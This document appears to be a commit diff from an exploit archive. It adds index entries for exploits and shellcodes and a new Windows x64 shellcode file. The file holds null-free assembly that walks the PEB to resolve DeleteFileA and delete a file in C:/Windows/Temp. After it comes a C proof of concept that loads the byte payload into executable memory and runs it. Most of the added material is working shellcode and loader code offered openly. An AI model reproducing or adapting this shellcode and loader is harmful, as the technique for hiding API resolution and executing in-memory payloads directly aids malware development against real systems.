 16074,exploits/php/webapps/16074.txt,"MultiCMS - Local File Inclusion",2011-01-29,R3VAN_BASTARD,webapps,php,,2011-01-29,2011-01-29,1,,,,,,http://packetstormsecurity.org/files/view/97987/multicms-lfi.txt
@ -29793,6 +29797,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41413,exploits/php/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,webapps,php,,2017-02-21,2017-07-18,1,CVE-2016-9553,,,,,
 40725,exploits/php/webapps/40725.txt,"Sophos Web Appliance 4.2.1.3 - Remote Code Execution",2016-11-07,KoreLogic,webapps,php,,2016-11-07,2016-11-07,1,,,,,,
 42012,exploits/php/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,webapps,php,,2017-05-16,2017-07-18,1,CVE-2017-6412,,,,,
 51396,exploits/php/webapps/51396.sh,"Sophos Web Appliance 4.3.10.4 - Pre-auth command injection",2023-04-25,"Behnam Abasi Vanda",webapps,php,,2023-04-25,2023-04-25,0,CVE-2023-1671,,,,,
 48074,exploits/php/webapps/48074.txt,"SOPlanning 1.45 - 'by' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,http://www.exploit-db.comsoplanning-1-45.zip,
 48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,,
 48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,,
@ -39160,6 +39165,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8782,exploits/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Local Privilege Escalation",2009-05-26,"NT Internals",local,windows,,2009-05-25,,1,OSVDB-54775;CVE-2009-1824,,2009-PsDrv_Exp.zip,,,
 12261,exploits/windows/local/12261.rb,"Archive Searcher - '.zip' Local Stack Overflow",2010-04-16,Lincoln,local,windows,,2010-04-15,,1,OSVDB-63810,,,http://www.exploit-db.com/screenshots/misc/screen-shot-2011-01-09-at-50312-pm.png,http://www.exploit-db.comas_2_1.zip,
 40335,exploits/windows/local/40335.txt,"ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation",2016-09-05,sh4d0wman,local,windows,,2016-09-05,2016-09-05,1,,,,,,
 51393,exploits/windows/local/51393.txt,"Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path",2023-04-25,msd0pe,local,windows,,2023-04-25,2023-04-25,0,,,,,,
 50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",2021-09-06,"Salman Asad",local,windows,,2021-09-06,2022-08-01,0,,,,,http://www.exploit-db.comDVR_stp.exe,
 50130,exploits/windows/local/50130.py,"Argus Surveillance DVR 4.0 - Weak Password Encryption",2021-07-16,"Salman Asad",local,windows,,2021-07-16,2022-08-01,1,,,,,http://www.exploit-db.comDVR_stp.exe,
 44169,exploits/windows/local/44169.txt,"Armadito Antivirus 0.12.7.2 - Detection Bypass",2018-02-22,"Souhail Hammou",local,windows,,2018-02-22,2018-02-22,0,CVE-2018-7289,,,,,
@ -40784,6 +40790,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46972,exploits/windows/local/46972.html,"Nvidia GeForce Experience Web Helper - Command Injection",2019-06-03,"Rhino Security Labs",local,windows,,2019-06-07,2022-11-04,0,CVE-2019‑5678,,,,,https://github.com/RhinoSecurityLabs/CVEs/blob/0e318a283b00cf42ceb8b898e756deb62082c3aa/CVE-2019-5678/CVE%E2%80%912019%E2%80%915678.html
 38792,exploits/windows/local/38792.txt,"Nvidia Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",local,windows,,2015-11-23,2015-11-23,1,CVE-2015-7865;OSVDB-130456,,,,,https://code.google.com/p/google-security-research/issues/detail?id=515
 48391,exploits/windows/local/48391.txt,"NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path",2020-04-28,"Roberto Piña",local,windows,,2020-04-28,2020-04-28,0,,,,,,
 51389,exploits/windows/local/51389.txt,"OCS Inventory NG 2.3.0.0 - Unquoted Service Path",2023-04-25,msd0pe,local,windows,,2023-04-25,2023-04-25,0,,,,,,
 49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",2021-05-11,1F98D,local,windows,,2021-05-11,2021-05-11,0,,,,,,
 49005,exploits/windows/local/49005.txt,"OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path",2020-11-09,"Julio Aviña",local,windows,,2020-11-09,2020-11-09,0,,,,,,
 388,exploits/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",local,windows,,2004-08-09,2016-10-27,1,OSVDB-8408;CVE-2004-0733,,,,http://www.exploit-db.comodbg110.zip,
@ -41491,6 +41498,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50912,exploits/windows/local/50912.py,"Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)",2022-05-11,"Netanel Cohen",local,windows,,2022-05-11,2022-06-27,1,CVE-2021-44595,,,,,
 49101,exploits/windows/local/49101.txt,"Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path",2020-11-25,"Luis Sandoval",local,windows,,2020-11-25,2020-11-25,0,,,,,,
 50757,exploits/windows/local/50757.txt,"Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path",2022-02-18,"Luis Martínez",local,windows,,2022-02-18,2022-02-18,0,,,,,,
 51395,exploits/windows/local/51395.txt,"Wondershare Filmora 12.2.9.2233 - Unquoted Service Path",2023-04-25,msd0pe,local,windows,,2023-04-25,2023-04-25,0,,,,,,
 50787,exploits/windows/local/50787.txt,"Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions",2022-02-24,"Luis Martínez",local,windows,,2022-02-24,2022-02-24,0,,,,,,
 50756,exploits/windows/local/50756.txt,"Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path",2022-02-18,"Luis Martínez",local,windows,,2022-02-18,2022-02-18,0,,,,,,
 40535,exploits/windows/local/40535.txt,"Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation",2016-10-14,"Saeed Hasanzadeh",local,windows,,2016-10-17,2016-10-17,0,,,,,http://www.exploit-db.compdfelement_setup_full1042.exe,
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -930,6 +930,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 13828,shellcodes/windows/13828.c,"Windows - MessageBoxA() Shellcode (238 bytes)",2010-06-11,RubberDuck,,windows,238,2010-06-10,2018-01-09,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-648.php
 14052,shellcodes/windows/14052.c,"Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,,windows,195,2010-06-25,2018-01-09,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-662.php
 15136,shellcodes/windows/15136.cpp,"Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode",2010-09-27,"Celil Ünüver",,windows,,2010-09-27,2010-11-06,1,,,,,,
 51390,shellcodes/windows/51390.asm,"Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode",2023-04-25,Nayani,,windows,,2023-04-25,2023-04-25,0,,,,,,
 13525,shellcodes/windows_x86/13525.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes)",2005-07-26,loco,,windows_x86,29,2005-07-25,,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-388.php
 13526,shellcodes/windows_x86/13526.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,,windows_x86,31,2005-01-25,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-387.php
 13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes)",2005-01-09,oc192,,windows_x86,35,2005-01-08,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-260.php
--- a/shellcodes/windows/51390.asm
+++ b/shellcodes/windows/51390.asm
@ -0,0 +1,146 @@
 ; Name: Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode
 ; Author: Nayani
 ; Date: 22/04/2023
 ; Tested on: Microsoft Windows [Version	10.0.22621 Build 22621]
 ; Description:
 ; This an implementation of DeleteFileA Windows api to delete a file in the C:/Windows/Temp/ directory.
 ; To test this code create a file:
 ; echo "test" >> C:/Windows/Temp/test.txt
 ; and then execute the shellcode
 ; This code uses PEB to resolve kernel32 and find the DeleteFileA function.
 sub rsp, 28h
 and rsp, 0fffffffffffffff0h
 xor rdi, rdi
 mul rdi
 mov r9, gs:[rax+0x60]
 mov r9, [r9+0x18]
 mov r9, [r9+0x20]
 mov r9, [r9]
 mov r9, [r9]
 mov r9, [r9+0x20]
 mov r8, r9
 ; Get kernel32.dll ExportTable Address
 mov r9d, [r9+0x3C]
 add r9, r8
 xor rcx, rcx
 add cx, 0x88ff
 shr rcx, 0x8
 mov edx, [r9+rcx]
 add rdx, r8
 ; Get &AddressTable from Kernel32.dll ExportTable
 xor r10, r10
 mov r10d, [rdx+0x1C]
 add r10, r8
 ; Get &NamePointerTable from Kernel32.dll ExportTable
 xor r11, r11
 mov r11d, [rdx+0x20]
 add r11, r8
 ; Get &OrdinalTable from Kernel32.dll ExportTable
 xor r12, r12
 mov r12d, [rdx+0x24]
 add r12, r8
 jmp short name_api
 getaddr:
 pop r9
 pop rcx
 xor rax, rax
 mov rdx, rsp
 push rcx
 check_loop:
 mov rcx, [rsp]
 xor rdi,rdi
 mov edi, [r11+rax*4]
 add rdi, r8
 mov rsi, rdx
 repe cmpsb
 je resolver
 incloop:
 inc rax
 jmp short check_loop
 resolver:
 pop rcx
 mov ax, [r12+rax*2]
 mov eax, [r10+rax*4]
 add rax, r8
 push r9
 ret
 name_api:
 ; DeleteFileA
 xor rcx, rcx
 add cl, 0xC
 mov rax, 0x41656CFFFFFFFFFF		;leA
 shr rax, 40
 push rax
 mov rax, 0x69466574656C6544		;DeleteFi
 push rax
 push rcx
 call getaddr
 mov r14, rax
 ; Bool DeleteFileA(
 ;   LPCSTR lpFileName
 ; );
 xor rcx, rcx
 mul rcx
 push rax
 mov rax, 0x7478742E74736574
 push rax
 mov rax, 0x2F706D65542F7377 ; ws/temp
 push rax
 mov rax, 0x6F646E69572F3A43 ; c:/Windo
 push rax                    ; RSP = "test.txt"
 mov rcx, rsp                ; RCX = "test.txt"
 sub rsp, 0x20
 call r14                    ;Delete File in C:/Windows/Temp/test.txt
 add rsp, 0x20
 [!]===================================== POC ========================================= [!]
 #include <windows.h>
 void main() {
  void* exec;
  BOOL rv;
  HANDLE th;
  DWORD oldprotect = 0;
  unsigned char payload[] = "\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xff\x48\xf7\xe7\x65\x4c\x8b\x48\x60\x4d\x8b\x49\x18\x4d\x8b\x49\x20\x4d\x8b\x09\x4d\x8b\x09\x4d\x8b\x49\x20\x4d\x89\xc8\x45\x8b\x49\x3c\x4d\x01\xc1\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x41\x8b\x14\x09\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x34\x41\x59\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04\x82\x4c\x01\xc0\x41\x51\xc3\x48\x31\xc9\x80\xc1\x0c\x48\xb8\xff\xff\xff\xff\xff\x6c\x65\x41\x48\xc1\xe8\x28\x50\x48\xb8\x44\x65\x6c\x65\x74\x65\x46\x69\x50\x51\xe8\xa6\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x74\x65\x73\x74\x2e\x74\x78\x74\x50\x48\xb8\x77\x73\x2f\x54\x65\x6d\x70\x2f\x50\x48\xb8\x43\x3a\x2f\x57\x69\x6e\x64\x6f\x50\x48\x89\xe1\x48\x83\xec\x20\x41\xff\xd6\x48\x83\xc4\x20";
  unsigned int payload_len = 500;
  exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
  RtlMoveMemory(exec, payload, payload_len);
  rv = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect);
  th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);
  WaitForSingleObject(th, -1);
 }